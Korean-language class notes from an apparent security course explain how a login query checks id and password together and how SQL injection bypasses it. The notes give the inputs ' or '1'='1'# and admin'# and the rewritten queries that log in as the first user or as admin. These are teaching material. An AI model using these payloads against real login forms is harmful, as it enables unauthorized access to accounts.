2주차 수업 (2)

로그인 로직

1. 식별 & 인증 동시

select * from member where id='' AND passwd='';

• 쿼리의 실행 결과가 존재하면 로그인 성공, 실행 결과가 존재하지 않으면 로그인 실패
• id와 passwd column을 동시에 만족하는 row를 가져온다.

---

로그인 로직별 인증우회

1. 식별 & 인증 동시

select * from member where id='' AND passwd='';

해당 SQL문은 id컬럼과 passwd 컬럼이 동시에 만족하는 row를 가져온다.

따라서 ' or '1'='1'# 을 입력해보자.

select * from member where id=''or'1'='1'#' AND passwd='';

그러면  위와 같이 # 뒤로는 주석처리가 되어 아래와 같은 SQL문이 된다.

select * from member where true;

DB에서 member 테이블을 조회했을 때 맨 위에 출력되는 사용자로 로그인 하게된다.

 

select * from member where id='admin'#' AND passwd='';

또는 id를 admin으로 가정하고 id를 안다고 했을 때 로그인창에 admin'#을 입력하면 위와 같은 SQL문이 된다.